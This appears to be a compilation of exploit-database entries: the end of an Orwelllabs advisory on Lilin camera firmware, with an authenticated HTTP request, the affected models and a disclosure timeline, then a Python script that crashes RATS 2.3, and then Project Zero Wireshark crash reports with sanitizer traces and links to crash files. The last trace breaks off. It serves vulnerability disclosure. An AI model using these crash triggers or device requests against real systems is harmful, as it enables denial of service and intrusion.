User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: O|orwell/labs,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/new/setup.htm
Cookie: lang=0; ScreenMode=O-Orw3lll@bs; profileno=0; uimode=1
Connection: keep-alive
Authorization: Basic YWRtaW46cGFzcw==
Affected products
=================
L series with firmware 1.4.36/1.2.02, OS Version: Linux 2.6.38/Linux 2.6.32.
LB1022X
LR7224X
LR7228X
LR7424X
LR7428X
LR7722X
LR7022
LR7922
LR6122X
LR6022X
LR2322X
LR2122
LR312
LR832
LR2522
LD6122X
LD2322X
LD2122
LD2222
*Once this is related with a old bad design its probably that a large range
of products are affected by reported issues.
Timeline
++++++++
2016-03-23: First attemp to contact Vendor
2016-04-22: Request #13617 "Lilin Products Vulnerabilities" created
2016-04-23: Attemp to contact vendor
2016-04-25: Vendor response (ask for details)
2016-04-27: According to the Vendor these issues are already know and will
be remediated in the future.
2016-04-28: Full disclosure
About Orwelllabs
++++++++++++++++
Orwelllabs is an independent security research lab interested in IoT, what
means embedded devices and all its components like web applications, network,
mobile applications and all surface areas prone to attack. Orwelllabs aims
to study, learn and produce some intelligence around this vast and
confusing big picture called smart cities. We have special appreciation for
devices designed to provide security to these highly technological cities,
also known as Iost (Internet of Things Security).
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
# Exploit Title: RATS 2.3 Array Out of Block Crash
# Date: 29th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day
from os import system
def crash():
with open('crash.c', 'w') as file:
file.write("char g [MAX_SIZE];") # Out of Block array, causes crash
try:
com = ('rats -w3 --xml crash.c')
return system(com)
except:
print("Is RATS installed?")
def main():
print("Author: David Silveiro ")
print("Website: Xino.co.uk ")
print("Title: RATS 2.3 Array Out Of Block Crash \n")
crash()
if __name__ == "__main__":
main()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=802
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==27389==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e9e9a68 at pc 0x7fa9c4c2d7a3 bp 0x7fff6e9e96b0 sp 0x7fff6e9e96a8
WRITE of size 8 at 0x7fff6e9e9a68 thread T0
#0 0x7fa9c4c2d7a2 in dissect_2008_16_security_4 wireshark/epan/dissectors/packet-dof.c:2662:32
#1 0x7fa9c4c2e3f6 in dof_dissect_pdu wireshark/epan/dissectors/packet-dof.c:12619:16
#2 0x7fa9c4c2ce35 in dof_dissect_pdu_as_field wireshark/epan/dissectors/packet-dof.c:12613:20
#3 0x7fa9c4c2a7ed in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8929:26
#4 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#5 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#6 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#7 0x7fa9c4c68aca in dissect_app_common wireshark/epan/dissectors/packet-dof.c:5405:13
#8 0x7fa9c4c658b6 in dissect_dpp_2 wireshark/epan/dissectors/packet-dof.c:7370:27
#9 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#10 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#11 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#12 0x7fa9c4c3a7a2 in dof_dissect_dpp_common wireshark/epan/dissectors/packet-dof.c:5490:13
#13 0x7fa9c4c5d5c0 in dissect_dnp_1 wireshark/epan/dissectors/packet-dof.c:6676:23
#14 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#15 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#16 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#17 0x7fa9c4c39598 in dof_dissect_dnp_common wireshark/epan/dissectors/packet-dof.c:5528:9
#18 0x7fa9c4c390a0 in dissect_dof_common wireshark/epan/dissectors/packet-dof.c:5627:5
#19 0x7fa9c4c59e5c in dissect_dof_udp wireshark/epan/dissectors/packet-dof.c:5864:12
#20 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#21 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#22 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#23 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9
#24 0x7fa9c62dddf0 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:585:7
#25 0x7fa9c62ecd90 in dissect wireshark/epan/dissectors/packet-udp.c:1080:5
#26 0x7fa9c62e0ae0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1086:3
#27 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7fa9c52a333b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1977:7
#31 0x7fa9c5312dba in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2399:14
#32 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#33 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#34 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#35 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9
#36 0x7fa9c5938ee2 in dissect_null wireshark/epan/dissectors/packet-null.c:457:12
#37 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#38 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#39 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#40 0x7fa9c4e81105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#41 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#42 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
#43 0x7fa9c407aa1e in call_dissector_only wireshark/epan/packet.c:2764:8
#44 0x7fa9c406b8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#45 0x7fa9c406acd4 in dissect_record wireshark/epan/packet.c:539:3
#46 0x7fa9c401ddb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#47 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#48 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#49 0x51e67c in main wireshark/tshark.c:2192:13
Address 0x7fff6e9e9a68 is located in stack of thread T0 at offset 168 in frame
#0 0x7fa9c4c2945f in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8718
This frame has 8 object(s):
[32, 34) 'app'
[48, 52) 'app_len'
[64, 66) 'version'
[80, 84) 'length'
[96, 128) 'key'
[160, 168) 'response' <== Memory access at offset 168 overflows this variable
[192, 194) 'version129'
[208, 212) 'length130'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-dof.c:2662:32 in dissect_2008_16_security_4
Shadow bytes around the buggy address:
0x10006dd352f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35330: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f2 04 f2
=>0x10006dd35340: 02 f2 04 f2 00 00 00 00 f2 f2 f2 f2 00[f2]f2 f2
0x10006dd35350: 02 f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10006dd35390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==27389==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12351. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39748.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=804
The following crash due to an asserion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
ERROR:./address.h:144:alloc_address_wmem: assertion failed: (addr_data == NULL)
Program received signal SIGABRT, Aborted.
0x00007fffe13f5cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007fffe13f5cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007fffe13f90d8 in __GI_abort () at abort.c:89
#2 0x00007fffe2e8c165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007fffe2e8c1fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffeabea578 in alloc_address_wmem (scope=0x60700000c110, addr=0x7ffe9039af00, addr_type=22,
addr_len=0, addr_data=0x7ffe9039acb0) at ./address.h:144
#5 0x00007fffeabe3454 in copy_address_wmem (scope=0x60700000c110, to=0x7ffe9039af00, from=0x7ffe9039a920)
at ./address.h:254
#6 0x00007fffeabe2ec7 in conversation_new (setup_frame=10, addr1=0x7ffe9039a8e8, addr2=0x7ffe9039a920,
ptype=PT_NONE, port1=0, port2=0, options=2) at conversation.c:701
#7 0x00007fffebfe61a8 in get_peer_conversation (pinfo=0x61400000f058, tpt_conv_data=0x7ffe9039a8c0, create=1)
at packet-jxta.c:800
#8 0x00007fffebfda23d in dissect_jxta_stream (tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0,
data=0x7fffffff5f30) at packet-jxta.c:682
#9 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c302a0, tvb=0x61d0001a6000,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:656
#10 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c302a0, tvb=0x61d0001a6000,
pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffff5f30) at packet.c:731
#11 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91c302a0, tvb=0x61d0001a6000, pinfo=0x61400000f058,
tree=0x6190001500a0, data=0x7fffffff5f30) at packet.c:2764
#12 0x00007fffeabe9336 in try_conversation_dissector (addr_a=0x61400000f118, addr_b=0x61400000f130,
ptype=PT_TCP, port_a=32925, port_b=9711, tvb=0x61d0001a6000, pinfo=0x61400000f058, tree=0x6190001500a0,
data=0x7fffffff5f30) at conversation.c:1323
#13 0x00007fffecd90b6b in decode_tcp_ports (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058,
tree=0x6190001500a0, src_port=32925, dst_port=9711, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30)
at packet-tcp.c:4981
#14 0x00007fffecd96f1b in process_tcp_payload (tvb=0x61d0001a6ed0, offset=32, pinfo=0x61400000f058,
tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, src_port=32925, dst_port=9711, seq=145, nxtseq=3338,
is_tcp_segment=1, tcpd=0x7ffe9039a3c0, tcpinfo=0x7fffffff5f30) at packet-tcp.c:5085
#15 0x00007fffecd91fcc in dissect_tcp_payload (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, offset=32, seq=145,
nxtseq=3338, sport=32925, dport=9711, tree=0x6190001500a0, tcp_tree=0x7ffe901993c0, tcpd=0x7ffe9039a3c0,
tcpinfo=0x7fffffff5f30) at packet-tcp.c:5166
#16 0x00007fffecda8229 in dissect_tcp (tvb=0x61d0001a6ed0, pinfo=0x61400000f058, tree=0x6190001500a0,
data=0x7ffe8ff93880) at packet-tcp.c:6071
#17 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7ffe8ff93880) at packet.c:656
#18 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c61460, tvb=0x61d0001a6ed0,
pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:731
#19 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000093c40, uint_val=6, tvb=0x61d0001a6ed0,
pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7ffe8ff93880) at packet.c:1190
#20 0x00007fffebe8733c in ip_try_dissect (heur_first=0, tvb=0x61d0001a6ed0, pinfo=0x61400000f058,
tree=0x6190001500a0, iph=0x7ffe8ff93880) at packet-ip.c:1977
#21 0x00007fffebe9214a in dissect_ip_v4 (tvb=0x61d0001a6140, pinfo=0x61400000f058, parent_tree=0x6190001500a0,
data=0x0) at packet-ip.c:2476
#22 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91d022f0, tvb=0x61d0001a6140,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x0) at packet.c:656
#23 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91d022f0, tvb=0x61d0001a6140,
pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:731
#24 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000052380, uint_val=2048,
tvb=0x61d0001a6140, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x0) at packet.c:1190
#25 0x00007fffeac548f5 in dissector_try_uint (sub_dissectors=0x61d000052380, uint_val=2048, tvb=0x61d0001a6140,
pinfo=0x61400000f058, tree=0x6190001500a0) at packet.c:1216
#26 0x00007fffeb97476a in dissect_ethertype (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0,
data=0x7fffffffa080) at packet-ethertype.c:257
#27 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:656
#28 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0,
pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffa080) at packet.c:731
#29 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, pinfo=0x61400000f058,
tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2764
#30 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2777
#31 0x00007fffecb24cac in dissect_sll (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0,
---Type <return> to continue, or q <return> to quit---
data=0x61300000df08) at packet-sll.c:291
#32 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x61300000df08) at packet.c:656
#33 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0,
pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08) at packet.c:731
#34 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000051a40, uint_val=25,
tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08)
at packet.c:1190
#35 0x00007fffeba65106 in dissect_frame (tvb=0x61d0001a74c0, pinfo=0x61400000f058, parent_tree=0x6190001500a0,
data=0x7fffffffc560) at packet-frame.c:492
#36 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:656
#37 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0,
pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffc560) at packet.c:731
#38 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, pinfo=0x61400000f058,
tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2764
#39 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0,
pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2777
#40 0x00007fffeac4ecd5 in dissect_record (edt=0x61400000f040, file_type_subtype=1, phdr=0x61300000dea0,
tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at packet.c:539
#41 0x00007fffeac01dba in epan_dissect_run_with_taps (edt=0x61400000f040, file_type_subtype=1,
phdr=0x61300000dea0, tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at epan.c:376
#42 0x000000000052ef40 in process_packet (cf=0x14b82e0 <cfile>, edt=0x61400000f040, offset=2804,
whdr=0x61300000dea0, pd=0x6210000fb500 "\300", tap_flags=0) at tshark.c:3727
#43 0x000000000052830d in load_cap_file (cf=0x14b82e0 <cfile>, save_file=0x0, out_file_type=2,
out_file_name_res=0, max_packet_count=-9, max_byte_count=0) at tshark.c:3483
#44 0x000000000051e67d in main (argc=3, argv=0x7fffffffe268) at tshark.c:2192
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12354. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39749.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=806
The following crashes due to a static out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
READ of size 4 at 0x7fa5e68bd620 thread T0
#0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
#1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
#2 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7fa5dc4f777c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7fa5dc4d0d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7fa5dc4d04fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7fa5dc4da910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7fa5dc4d419a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7fa5dc4d5fb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7fa5d9d83bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7fa5daf6591b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7fa5daf5756a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7fa5d9d7ad4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7fa5dab8c105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7fa5d9d75cd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7fa5d9d28db9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
Shadow bytes around the buggy address:
0x0ff53cd0fa70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x0ff53cd0fa80: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff53cd0fa90: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0faa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ff53cd0fab0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
=>0x0ff53cd0fac0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff53cd0fad0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
0x0ff53cd0fae0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0faf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0fb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0fb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==666==ABORTING
--- cut ---
--- cut ---
==695==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7feb11013620 at pc 0x7feb06c7b825 bp 0x7ffd6fe96b00 sp 0x7ffd6fe96af8
READ of size 4 at 0x7feb11013620 thread T0
#0 0x7feb06c7b824 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25
#1 0x7feb06c68ba8 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10563:21
#2 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7feb06c4d77c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
